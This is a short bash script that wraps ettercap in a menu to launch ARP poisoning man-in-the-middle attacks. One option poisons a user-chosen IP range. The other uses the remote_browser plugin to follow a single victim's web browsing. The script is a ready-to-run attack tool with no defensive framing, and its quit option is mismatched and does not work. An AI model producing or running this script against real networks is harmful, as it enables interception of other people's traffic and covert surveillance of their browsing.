#!/bin/bash
echo "Enter choice"
echo "Normal is regular ARP Poisoning"
echo "Follow Browser follows remote browser activity"
echo "Quit is simple..."
select CHOICE in Normal FollowBrowser Quit
do
case "$CHOICE" in
"Normal")
echo "Input IP range to scan"
echo ""
echo "Use the format 10.1.1.1-5"
echo "to scan all between, or 10.1.1.1,5 to scan just"
echo "10.1.1.1 and 10.1.1.5"
read IP
echo "Now ARP Poisoning the chosen hosts!"
sudo ettercap -Tq -M arp:remote /$IP/ -P autoadd
;;
"FollowBrowser")
echo "Input single IP"
read IP
echo "Now ARP Poisoning the chosen IP"
sudo ettercap -Tq -M arp:remote /$IP/ -P remote_browser autoadd
;;
"quit")
exit
;;
esac
done